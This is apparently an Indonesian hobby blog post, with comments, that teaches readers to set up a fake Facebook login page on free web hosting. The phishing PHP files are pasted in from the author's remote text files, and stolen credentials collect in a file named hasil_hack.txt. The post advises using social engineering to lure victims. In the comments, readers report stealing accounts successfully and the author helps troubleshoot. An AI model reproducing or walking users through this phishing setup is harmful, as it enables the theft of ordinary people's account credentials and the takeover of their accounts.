http://hackyourlove.com/wp-content/uploads/2010/08/facebookhacking.jpg
mumpung g lagi sibuk, mmpung udah mandi n GANTENG, saatnya posting..hehe
BTW hari ibu kmaren ngasih apa buat ibunya?? wkwkwkk...
ane sih cm ngasih ini aja buat bunda :


hehe emang ga penting sih, abis mau ngasih apa lg, Maklum anak g kreatif wakakakakak....


Sesuai judul , kenapa update? berhubung di xtreemhost banyak yg d suspend jd saya cari2 lg webhost yg lain..
Ternyata g di sangka2 banyak jg yg tertarik dgn teknik lama ini..ya emg mungkin ini teknik Jadul, tapi dengan sedikit hiasan social enginering korban mau jg login lewat fake login kita, menurut saya jalan lain selain keylogger ya ini..kalo dulu sebelum ada pertanyaan keamanan pada FB , kita masih bisa menggunakan teknik tanam email..yahhh skrg mau gimana lagi, hehe..
1 hal ane paling benci sama org yg sooo...hack fb org yg gak punya dosa, trs masih sempet belagu update status jorok... wkwkwk..
yg harus d ketahui ane bikin tutorial ky gini bkn karena ane hacker/cracker tp suka aja sama yg kaya ginian..wkwwk..
ok mulai...
Sekarang kita daftar di http://cixx6.com

Langsung aja klik http://cixx6.com/signup2.html , silahkan register..lalu klik save.. selesaikan sampai beres..
tinggal di lihat pada email nanti agan confirmasi..
jika nanti disuruh mengisi domain, isi aja terserah jika punya saya ini groupfacebook.cixx6.com
jika semuanya selesai, silahkan klik / login di http://cpanel.cixx6.com..
ok agan sudah masuk cpanel, sekarang klik File Manager 1 ..
sudah??
skrg tinggal proses upload..
siapkan ketiga file fake loginnya.. jika belum punya bisa di lihat di postingan yg dulu, atau ikuti saja perintah di bawah..

1. klik public_html
2. klik new file
3. klik http://groupfacebook.cixx6.com/1.txt , Copy semua ( Ctrl+A - Ctrl+C )
4. Paste di halaman new file hostingan kalian, new file name di isi dengan facebook.php, lalu save...
5. jika sudah d save, klik panah kembali, dan klik new file lagi..
6. klik http://groupfacebook.cixx6.com/2.txt , Copy paste lagi dan beri nama jhn.php , lalu save..
7. klik new file lagi, hehehehe.... yang ini tidak perlu di isi apa2, hanya beri nama dengan hasil_hack.txt lalu save
8. cb lihat d email , domainnya apa?? contoh punya saya http://groupfacebook.cixx6.com/
    berarti fake loginnya http://groupfacebook.cixx6.com/facebook.php
9. dan jika hasilnya tinggal ganti facebook.php dengan hasil_hack.txt seperti ini
     http://groupfacebook.cixx6.com/hasil_hack.txt
10. coba anda login dan lihat, apa berhasil ???

mungkin itu dulu ok..
jika berguna silahkan komentar :D

19 komentar:

Indodotnet mengatakan...

Saya sangat tertarik dengan dunia hacking n' cracking,,blog sobat sangat membantu dengan membahas posting² tersebut.

update trus sob,,,

RifaL mengatakan...

terimakasih sob, tolong kritikannya jika ada yg kurang atau salah..
terimakasih kunjungannya.. :)

Tuanku Rezandy AP mengatakan...

Permisi, mas mau nanya nih. Kan saya lihat di email terus domainnya saya buka di tab baru, ko yg muncul bukan halaman login facebook ya ? tapi malah begini :

Index of/

-facebook.php
-hasil_hack.txt
-hasil_hack.txt.txt
-jhn.php



udah mas cuma begitu aja yg muncul. kalau diklik yg facebook.php baru muncul halaman login facebooknya. kira2 yg salah apanya mas ? trs kalau mau lihat pass sama email yg udh kehack gimana caranya mas ? maklum mas masih blo'on, hehehe... trmksh mas sblmnya

RifaL mengatakan...

mungkin mas salah nyimpen filenya :)
biasanya d masukan d folder public_html..
emang daftar hostingan dimana? nanti saya coba biar jelas :)

o iya alamatnya sudah benar blm??
pake /facebook.php ga?
contoh : www.contoh.com/facebook.php
untuk hasil rubah mnjadi www.contoh.com/hasil_hack.txt :)

Tuanku Rezandy AP mengatakan...

saya daftar di webhosting http://cixx6.com mas :)
ketiga file itu saya simpan di public_html

kalau yg punya saya alamat fake loginnya begini mas :
http://tuankufacebook.cixx6.com/facebook.php

trs waktu saya ganti facebook.phpnya sama hasil_hack.txt eh nyambungnya malah ke alamat ini mas : http://cixx6.com/web/

salah jalur kyknya saya nih, --"

RifaL mengatakan...

add facebook saya, trs kirim message..
saya bantu sebisa saya hehe :)

Tuanku Rezandy AP mengatakan...

nama facebooknya apa mas ?
saya add skrg

sblmnya trims bgt mas, jd bnyk ngerepotin begini ^^

dikasdprabumulih mengatakan...
Komentar ini telah dihapus oleh penulis.
Wilanda Rinaldi mengatakan...

kok gg bisa ada bacaan enter code here apa tuh

Anonim mengatakan...

cara bikinnya gimana kk,,
bingung saya gagal terus bikinnya...

ocha mengatakan...

berhasil gan....

terima kasih gan...
ta sun duLu :-* :-* :-*

Dabllink mengatakan...

sama2 gan =))
ampunnnnn ane gmw d cipok mahoo =)) hahahaha

hackers mengatakan...

sukses gan...

thanks,,, ;;)

Dabllink mengatakan...

sama2 gan :D

agung trisantoso mengatakan...

ane malah puyeng gan :))

Anonim mengatakan...

gan koq pas mau liat hasil_hack.txt nya gak bisa , malah ada tulisan kyak gini "The website is temporarily unable to service your request as it exceeded CPU limit. Please try again later."

mohon pencerahannya gan , maklum mash newbie ;;)

Dabllink mengatakan...

coba lg nanti...:)

Anonim mengatakan...

nama facebooknya apa gan,,, saya mau tau tutorial lengkapnya

Anonim mengatakan...

aduh mohon bantuannya, saya pusing banget nich, udah muter muter gak pakek ketemu tuh titk terangnya, padahal semua udah saya lakukan dr mulai daftar domain sampai hostingnya, bahkan juga udh saya upload tp hasilnya kok gak tau ya saya.
ini dia hosting saya
kok malah mash kosong ya
http://www.fecebok.byethost18.com

ni akun id email fb saya
achmadnursaid@ymail.com

saya tunggu jawabanyya di inbox saya

Poskan Komentar

:)) :)] ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* : 8-} ~x( :-t b-( :-L x( =))

Copyright 2010 Blog Iseng
Suported by : Indonesia lost-c0de™ > ID-10t